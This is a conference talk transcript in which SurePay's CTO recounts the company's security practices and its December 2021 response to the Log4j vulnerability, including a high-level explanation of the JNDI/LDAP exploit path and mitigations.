How We Battled the Log4j Zero Day Vulnerability at SurePay

Log in to watch

Amsterdam 2023

How We Battled the Log4j Zero Day Vulnerability at SurePay

In this presentation, SurePay's CTO, Friso Schutte will delve into the world of the Log4j vulnerabilities, with a focus on the timeline of SurePay's experience. You will learn about the challenges the SurePay team faced and the steps they took to address the issue. Friso will also discuss the wider implications of the Log4j threat and what organisations can do to protect themselves in the future.

Presented by Sonatype.

Chapters

Full transcript

The complete talk, organized by section.

Friso Schutte

So this talk is about the Log4j zero-day vulnerability and how we handled it. To give you some context, I need to speak a bit about SurePay and how we deal with security in general. The first half will be about SurePay and how we deal with security in general, and then we dive into the specifics of the Log4j vulnerability. I guess you guys know what it is, but I will still explain a little bit and try to go into the technical details also.

This is the setup about SurePay. SurePay is a fintech, so the name already implies it, right? We provide a safe way for making payments. Our clients are banks and corporates who use our service for everything that is related to financial transactions. Then I will explain about how we have set up security. It is bank-grade security because our clients are those banks. That's really interesting. And then how we tackled the Log4j.

In order to give you a little bit of context, what SurePay is: this is research done last year in Germany. We asked everybody, does your bank verify the name when you enter a name in a credit transfer, when you make a payment against the account holder for the IBAN? Guess what? Sixty-five percent of the people thought that this is the case, and 35% said, well, this is not the case. The only thing you need is the IBAN. I don't know what you guys think. It depends a bit on the country also.

Then we asked also, do you want the bank to verify the name? Almost everybody, 94%, said yes, we want the bank to verify the name, because otherwise when you make a payment to John Smith and the account number is maybe John Doe, then you're paying to the wrong person.

This is what we try to solve. In 2014, the SEPA rules in the Single European Payments Area said the single identifier for making a payment is the IBAN. Whatever you put in the name, it doesn't matter. If you put in, you know, X6X, then it will still go forward. The bank will not hold that payment back. This opens up the doors for misdirected payments, and this is exactly what we try to solve.

We made a solution. In the Netherlands, if you have a Dutch banking account, you will already know us. We are operating in the backend. This is a typical banking application. You make a payment. We will give you back whether the name corresponds to the account holder; that's the left one, the match; whether it's a close match; or whether it's a no match. The close match is necessary because of privacy rules. We cannot simply disclose information that the user doesn't know. The privacy rules in Europe make this a difficult problem to solve. We have to integrate with all the banks, and we cannot disclose information that is sensitive, of course.

That's in short what we do. Since the go-live in 2017, we have performed more than 4 billion checks already. About 83% results in a match, 12% in a close match, and 5% in a no match. The result is that there were 67% less misdirected payments and less invoice fraud. It's a positive business case. Of course, the operational overhead that comes with it is an important factor for the banks. They spend less money on the operations. For corporates, we also sell the product. They use it mostly for onboarding, and there's also less dropouts there. That's in short SurePay. That's what we try to solve. It's a niche product.

Of course you're interested in how we do this. I hope you're interested. This is a high-level architecture, really simplified of course, but it boils down to: on the right-hand side, the banks supply us with data. That can be either real time, so we call the bank, or it can be offline where they provide us with batches and store it in our data store. On the left-hand side, you see consumers, the consumers of our APIs. That can be a banking app or any financial organization, a booking application or something like that. We also provide a portal, and we can even do file-based checks. Just provide us a file and then we give it back. That's a really simple setup.

We also have some other sources. You can provide us with manual files, or we plug into the Chamber of Commerce, and then you can enrich the data and give a more sophisticated result back. That's really an obvious growth path. We plug into the police, for example, or sanction lists, those type of things, to mitigate fraud even better. We have lots of interesting banks, like the banks in the Netherlands, but also in the UK. We operate with NatWest and RBS and Virgin Money and those type of banks.

This is a different view of the architecture. We have an interface layer, business layer, and integration layer. I guess you can plug this architecture to any company, but the reason I showed this is that we also have cross-cutting concerns, layers like the user management and logging and monitoring, observability, and of course the security.

For security, we use things like intrusion detection with Alert Logic. Everything runs on AWS, so we use things like GuardDuty, CloudWatch, Security Hub, those type of things for the security layer. On the outer network layer, we use things like Route 53, AWS Shield, the usual AWS stack, if you are familiar with it.

That's on the technical side. We are a Java shop. We also use a lot of Kotlin and then Python, just because it's nicer, I think. It's more fun at least. In the development build cycle, we use things like Jenkins, SonarQube, GitHub, and of course Sonatype Nexus Lifecycle. Sonatype invited me here. Nexus Lifecycle is a product, I don't know if everybody knows it, but it scans and monitors your third-party libraries, so your open source libraries, to see if it's vulnerable or not. In light of Log4j, this is an important product.

This is just to give you some context. Even more important, I guess, is the way we deal with legal, compliance, and security. When I joined SurePay, my background is technical. I'm an architect. I used to be a developer. I thought everything is about technique, technology. But in our business, I think this is probably even more important: we have an extensive information security management system, ISMS. We are compliant to the ISO standard, ISO 27001, and a whole bunch of other certifications, Cyber Essentials. We have lots of policies for acceptable use, for access control, secure development, et cetera. Super, super important.

When you work in a really big company, I guess it's less visible. If you work in a small company like SurePay, we are less than a hundred people, so everybody needs to be aware of this. It's very, very important.

I don't know if it's readable, but this used to be an animation. This is the PDF version. You're overwhelmed with lots of information. I will read some of these. These are questions we typically get from the due diligence in RFPs. A question like, describe the processes or technologies you have in place for secure coding. Also, please advise where all the bank data is stored, including subcontractors, data centers, local storage and backup tapes, media even. These are typical questions we get. Do you undertake pen testing, and how frequently do you do that? Who is the one that does it? Do you have a certified pen tester, for example? Please outline also the full suite of encryption standards available in the product, both at rest and in transit. All of these questions we need to answer. For this, we have the policies, and everybody needs to be aware. It's very annoying to answer those questions.

Usually we answer with something like this. That is our security approach. We have data security on the highest level. Data at rest is encrypted with AWS KMS. Also on the transport layer, of course we have TLS, but also things like whitelisting or OAuth for the APIs. On the application security level, we have code reviews, also the pen testing. We have automatic code analysis tools like SonarQube. On the infra level, everything is infrastructure as code, obviously with CloudFormation mostly. We also use some CDK. Then the security governance: that's all the policies I already talked about. Also, very importantly, we for example have to screen every employee, and we have to prove that every employee is educated when it comes to secure code. We have a tool that monitors, like a lab tool, SecureFlag. I don't know if people know it. I can really recommend it.

This is the last slide about SurePay. Now we dive into Log4j. I just wanted to tell you guys that we have everything in place. It's really as it's supposed to be. It's security by design from the bottom up. Security was a major requirement. The architecture and tooling: we use a lot of AWS, what I already said. The process is based on ISO 27001. The way of working in the development process, in the organization, like the screening. And we have independent audits. To get the certification, you need an independent audit, of course.

That's about SurePay. That's the context. Now the question is, does this all help when you have a zero-day vulnerability? Because then you get a zero-day vulnerability, which basically means you have to act fast. Zero-day vulnerability means that it's out in the open. Everybody can exploit the vulnerability. In this case, it was a very simple thing to exploit. I tried it myself. Within a few hours, I could reverse shell into another machine. It was almost mind-blowing that it was possible to do that.

For us, this is, again, a pity: it's not an animation. You have to read from the bottom to the top. My security engineer, a security officer, sent me a Slack message. This is a real Slack. I didn't edit it. He said, there's a major vulnerability that needs my attention today. We are vulnerable. If we are vulnerable, that may require an emergency update.

That's interesting. I always ask people, how long does it take you to go into production? A lot of people say, well, we have the change management policy, so you need to have QA, a lower environment, higher advisor. Before you know it, you're two weeks further. But with a zero-day vulnerability, you can't afford that. You have to go fast. I will need a few developers and a few DevOps in case we are involved, to further check. We created the task force, let's say a war room. I told him, let me know if you have more info.

Then he came with this article. This was in 2021, by the way, December 10th. I remember really well because it was a Christmas party at our office. When these things come, they always come together with some other things. Some people could not really enjoy Christmas so much. The article explains that in Minecraft, you could take over somebody else's machine. Really dangerous, but also interesting. I responded and told them, well, we don't even use Log4j, so we are safe, but I haven't scanned it roughly.

Then he said, good morning, guys. This is a message to a bunch of engineers: if you are in this group, you volunteered to have an adventure in a shitty day. The typo, I think, is because the guy was a bit nervous. You have to understand, he is Italian with a bit of temperament. Really good guy, by the way. But you will see throughout the Slack messages more and more typos coming in. I have the feeling he was shaking when he was typing this in.

One of the engineers replied and said, additional reporting from the security firm LunaSec said that Java versions greater than specific numbers were not vulnerable. They were not affected by this attack vector because you cannot load remote codebase using LDAP. He said, I don't think we are affected as we use newer versions of JDK. Then our security engineer said, we haven't investigated thoroughly, and not all the particularities are known. At that time, Twitter also exploded, lots of articles came out, and it was very confusing what it really was. For me also. I had to dive into the whole Log4j. Is it about Java? Is it Log4j? Are you safe when you use a particular version or not?

I looked into it and found out that it's a vulnerability in the Log4j library. This is a library that is used in Java a lot. But not only that: it was already discovered before that in Minecraft. Minecraft was on the 9th of December, but two weeks before that, it was already discovered and privately disclosed to the Apache Software Foundation, where it is hosted. To make it even worse, it was already existent in the code for 10 years almost, since 2013. When you think about it, it's almost unreal. Sometimes it crossed my mind, well, maybe this was on purpose by some institutions or so. Anyway, it was there, and a lot of the programs are vulnerable. If you think about it, that 60% of the Java programs use it, it's really a serious threat. Akamai, one of the famous CDNs, estimated about 10 million attempts to exploit this vulnerability in that month of December per hour. Ten million per hour. So a lot.

What did Apache do? They patched it immediately, well, almost immediately. Once it was privately disclosed, they patched it on the 6th of December, but there was a soft patch. They just changed the default behavior, so you could still be vulnerable if you overwrite the default behavior, for example. Then a week later another patch came, and a week later yet another patch. It was difficult to fully patch it apparently. By that time, it was called Log4Shell, because potentially you could start up a shell, and that's one of the most dangerous type of attacks.

This is what my engineer said: another day, another vulnerability. Log4j. It started to feel a bit like COVID at that time. It was also every week a new variation. You might say, well, if it was patched, then what's the problem? This is a screenshot from the Sonatype website. They have a special section on Log4j. If you're interested in it, it's an interesting website. You can see how often Log4j is downloaded because Sonatype has the Maven repositories. About 25% of the still downloaded versions are vulnerable versions. It's impressive. A lot of those are of course transitive dependencies. It's not like people are purposefully downloading that vulnerable version, but it comes via another framework, for example. But just as dangerous, of course. In different geographic locations, it's different behavior. I saw that the Netherlands, you can hardly see it, but the Netherlands is not fully green there.

This is my security officer again. "Friso, we have a problem with the Jenkins." I told him, yes, I know a few, because Jenkins is not really well known for being super stable and friendly. I was asking, which one are you referring to? By the way, we are in an emergency call with NatWest, one of our big customers. We are demanding customers. We also had the Christmas party, so you can imagine everything comes on top of each other. The capacity is very limited.

An hour later, Jenkins was shut down by the security officer. I asked him, we cannot use Jenkins anymore? What's this? "Do you need it? We removed the load balancer. We found out that you could control it without authentication." Lots of typos here, but he found out that Jenkins was not set up properly. Afterwards it turned out to have nothing to do with Log4j, but I think this is one of the lessons learned. Once you have a zero-day vulnerability, you go over your whole landscape and you find a whole lot of garbage that you don't want to see, and you don't know if it has to do with Log4j at that point in time, yes or no. Of course, I asked him to start up Jenkins again, because it was not really a good moment to stop Jenkins at that time.

This is our approach. At first, we went over the whole of our landscape and verified: do we have Log4j in our stack, yes or no? It's not that easy to answer, to be honest. I thought it was easy. We have Nexus Lifecycle. We know for every repository which dependencies it has. But are we sure that every project is in Nexus Lifecycle? Do we know that each team properly followed up with the policies that we have? We were not 100% sure. So we ended up creating a script that goes crawling over the whole of the GitHub repositories to double, double, double check it, basically.

Also, you don't know about third-party products. We use, for example, Elastic. We use SonarQube. We use all kinds of databases. Do they use Log4j underneath, yes or no? Communication is also very important here.

Then we wanted to monitor the system, whether it was affected or not. You go over the logs, the HTTP logs. Do you see incoming traffic where somebody is trying to exploit it? Also, we tried to understand it and replay it. We have some really good engineers that can script their way around, try to replay it in our environment. We went over all the controls in production itself, and we created the Log4j war room. Very importantly, we communicated ourselves also, both internally but also externally, because lots of questions came in. We even got a compliment from one of our suppliers or one of our clients because we proactively informed them. Some of the vendors that we have, we were still asking them, so are you affected or not, and what are you doing against it or not? Communication is very, very important for this. Also, you can imagine that our business, the ones that are not in IT, they were messaging me continuously: what's happening? What's happening? So I needed to tell them something.

This is Sonatype Lifecycle. This is not from our production environment, because when I run this myself, there were some things that I didn't want to show in this presentation. This is just a screenshot from the internet and a random one. You can see this particular application uses a Struts version. It has a high security vulnerability, and some of them are high, some of them are critical. Very handy tool, very important. Nowadays, SBOM is a bill of material. It's a trending topic because you need to know what exactly is in your software. You can look it up.

This is what I already explained. Are all the projects in this Lifecycle tool, yes or no? And what about the third-party products? This was on the Sunday, the Sunday next to the Friday, and I asked people to join. Some of them were outside of the country, enjoying their weekend, but some of them were at home. I contacted them and said thanks for joining. So a small recap: we have scanned all our software. We are not using Log4j library ourselves, which means that we are safe, but we need to go over the third-party components like Kibana, Elastic, and some other tools. Kibana and Elastic are very important because that's where we log our messages. We use it for our audit data. Everything that comes in, every request response, we also store in Elastic, which is also necessary because of compliance reasons. It all comes together there.

I need to go a bit faster, I see. It boils down to that we had a Zoom call on Sunday, and the guy said, well, I asked my boss and she said okay. I guess his wife.

Very quickly about how it works. Lookup is a feature in Log4j that exists for a very long time, and it comes down to property substitution. In your log message, you can have a substitution of your property, for example Java version, and it will print out the Java version. But it can also be an environment property, for example. So this is a very simple way.

There was a guy who asked for this extension to it. Well, this is nice, the property substitutions, but I also want to have JNDI lookups in it. It's an extension to the existing thing. That was already implemented in 2013. So just a random guy who asked, can you extend this property substitution lookups with a JNDI lookup? But JNDI lookup is very dangerous because that's a way to inject code into your system. Now you can do a JNDI lookup with LDAP, and then you can call remote codebase and you can inject it in your own system.

I will skip this one. This is a little bit how it works on a high level. You have a hacker and you have a vulnerable application. The hacker calls the system with maybe in the User-Agent header or so this particular code, the JNDI lookup. If the application is vulnerable, it will fetch the class from LDAP. That can be a Java class, and in Java you can have static code. So even just loading the class can result in already running the code. You don't need to call a specific method. You can just run it. Then your evil code goes here. For example, you can start a netcat, and then you have a reverse shell. I tried it myself, and it really works. It's really dangerous.

Will it work in your situation? Now I come back to all the policies. It's not that easy to make it work. You need an open outbound network, for example. Do you have that? Well, I hope not. If you are in the core of your system, can you connect to any server in the outside world? Normally not. It also requires you to be able to even start a reverse shell. On my Mac, for example, it was not that trivial at all. Then again, there are always scripts on the internet that you can download, but it's difficult. If you stick to the least-privilege principle, then you're also kind of safe. It also requires an old version of Java, or you have to override the default settings. Finally, you have to log it in an unfiltered way. So what you receive, you have to log immediately. It's probably better to have it a bit filtered, maybe escape some weird characters or these type of things. And you need, of course, an old version of Log4j, because now it's patched there.

I'm running over time, but this is the last slide. One year after the attack, we can still see that a lot of firms are exposed. Recently I saw this article where Iranian hackers compromised the US Federal Agency's network using the Log4Shell exploit. So the message, I guess, is be careful. If you stick to your principles, then you will be safe. It's not that easy to exploit.

I think this was it because the next presentation will come quickly. I don't know if there's any room for questions. Is there somebody from the organization? Otherwise, maybe it's better if you just come up, reach me. I will be in the Sonatype booth a lot. Otherwise I will be walking around and you can contact me. Thank you.